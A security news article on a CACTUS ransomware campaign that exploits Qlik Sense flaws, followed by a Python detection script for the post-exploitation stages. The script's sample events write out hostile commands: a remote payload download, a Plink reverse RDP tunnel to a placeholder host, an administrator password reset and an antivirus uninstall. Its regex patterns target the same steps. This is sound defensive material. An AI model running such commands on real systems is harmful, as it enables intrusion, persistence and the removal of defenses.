A new CACTUS ransomware campaign is targeting vulnerabilities in Qlik Sense. According to Arctic Wolf researchers, who observed and disclosed the activity, this is the first reported instance of attackers deploying CACTUS ransomware after exploiting Qlik Sense for initial access. The vulnerabilities involved are CVE-2023-41265, CVE-2023-41266 and CVE-2023-48365; the last of these is a bypass of the initial fix for the first two, so installations patched only against the earlier pair remain exposed. The flaws have been exploited in a series of attacks, and organizations running Qlik Sense should patch promptly and review their defenses. The steps that follow exploitation are described below.
After exploiting the flaws, the attackers abuse the Qlik Sense Scheduler service to spawn processes that download additional tooling. The tools, ManageEngine Unified Endpoint Management and Security, AnyDesk and Plink, are used to establish persistence and remote control. Arctic Wolf also observed the attackers uninstalling Sophos software, changing the administrator account's password and building an RDP tunnel with Plink before deploying CACTUS ransomware, which shows how far the intrusion progresses before encryption begins. The campaign fits the broader ransomware picture: intrusions that grow more capable, an underground economy that supplies the access and tooling behind large-scale attacks, and governments that continue to struggle to curb the problem.
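As an added illustration, not code from Arctic Wolf or the original article, the following Python detection pass runs over constructed process-creation events shaped like Sysmon Event ID 1 records and tags the post-exploitation stages described above: the Scheduler service spawning a shell or downloader, remote-tool downloads, installation of remote-access software, a Plink reverse tunnel to RDP, an administrator password change and a Sophos uninstall. The Scheduler binary path, the file names, the 203.0.113.10 address and the command lines are assumptions made for the sample only, not indicators from the report.

```python
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (fields Sysmon Event ID 1 / Windows 4688 provide)."""
    parent_image: str
    image: str
    command_line: str


# Assumed basename of the Qlik Sense Scheduler service binary; adjust to the deployment.
SCHEDULER_BASENAME = "scheduler.exe"
# Children the Scheduler service has no business spawning: shells and LOLBin downloaders.
SHELLS_AND_DOWNLOADERS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                          "certutil.exe", "curl.exe", "bitsadmin.exe"}

DOWNLOAD_RE = re.compile(r"(?i)(invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
                         r"urlcache|bitsadmin.*/transfer|\bcurl\b)")
RAT_RE = re.compile(r"(?i)(anydesk|manageengine|uems)")
# Plink reverse forward (-R) that exposes the RDP port to the remote SSH host.
PLINK_TUNNEL_RE = re.compile(r"(?i)-R\s+\S*3389")
NET_USER_RE = re.compile(r"(?i)\bnet1?(\.exe)?\s+user\s+administrator\s+\S+")
AV_UNINSTALL_RE = re.compile(r"(?i)sophos.*(uninstall|/x\b|remove)|(uninstall|msiexec.*/x).*sophos")


def base(path: str) -> str:
    """Lower-cased basename of a Windows path, portable to any host OS."""
    return ntpath.basename(path).lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the stage tags a single event matches, in chain order."""
    tags: list[str] = []
    if base(ev.parent_image) == SCHEDULER_BASENAME and base(ev.image) in SHELLS_AND_DOWNLOADERS:
        tags.append("scheduler_spawn")
    if DOWNLOAD_RE.search(ev.command_line):
        tags.append("remote_download")
    if base(ev.image) == "anydesk.exe" or RAT_RE.search(ev.command_line):
        tags.append("remote_access_tool")
    if base(ev.image) == "plink.exe" and PLINK_TUNNEL_RE.search(ev.command_line):
        tags.append("rdp_tunnel")
    if NET_USER_RE.search(ev.command_line):
        tags.append("admin_password_change")
    if AV_UNINSTALL_RE.search(ev.command_line):
        tags.append("av_uninstall")
    return tags


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """(index, tags) for every event that matched at least one stage."""
    return [(i, t) for i, ev in enumerate(events) if (t := classify(ev))]


def stages_hit(events: list[ProcEvent]) -> set[str]:
    """Which stages of the chain appear anywhere in the batch; several together is the alert."""
    return {tag for _, tags in scan(events) for tag in tags}


# Constructed sample telemetry (not from the report). Paths, names and the
# documentation-range address 203.0.113.10 are placeholders.
SCHED = r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(SCHED, CMD,
              r'cmd.exe /c powershell -c "Invoke-WebRequest http://203.0.113.10/a.zip -OutFile C:\Windows\Temp\a.zip"'),
    ProcEvent(CMD, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Windows\Temp\UEMS_Agent.msi /qn"),
    ProcEvent(CMD, r"C:\Windows\Temp\AnyDesk.exe",
              r"C:\Windows\Temp\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"),
    ProcEvent(CMD, r"C:\Windows\System32\net.exe",
              r"net user Administrator Hunter2024!"),
    ProcEvent(CMD, r"C:\Windows\Temp\plink.exe",
              r"plink.exe -ssh -N -R 3389:127.0.0.1:3389 -pw p4ss tunnel@203.0.113.10"),
    ProcEvent(CMD, r"C:\Windows\System32\wbem\WMIC.exe",
              r"""wmic product where "name like 'Sophos%'" call uninstall /nointeractive"""),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\ops\notes.txt"),  # benign control
]


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(tags)}")
    print("stages seen:", sorted(stages_hit(SAMPLE_EVENTS)))
```

Each tag on its own is weak evidence (administrators also install AnyDesk and reset passwords); the signal is the Scheduler service spawning a shell at all, and several stages landing on one host in a short window. Tune the name matches to your telemetry and feed the chain view to an alert rather than the individual tags.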
This CACTUS campaign against Qlik Sense is a reminder that internet-exposed applications must be patched quickly and that the activity which follows initial access, from unexpected child processes of service binaries to new remote-access tools and tunnels, needs to be monitored. A proactive, layered security posture is what limits the damage when a flaw is exploited before it is patched.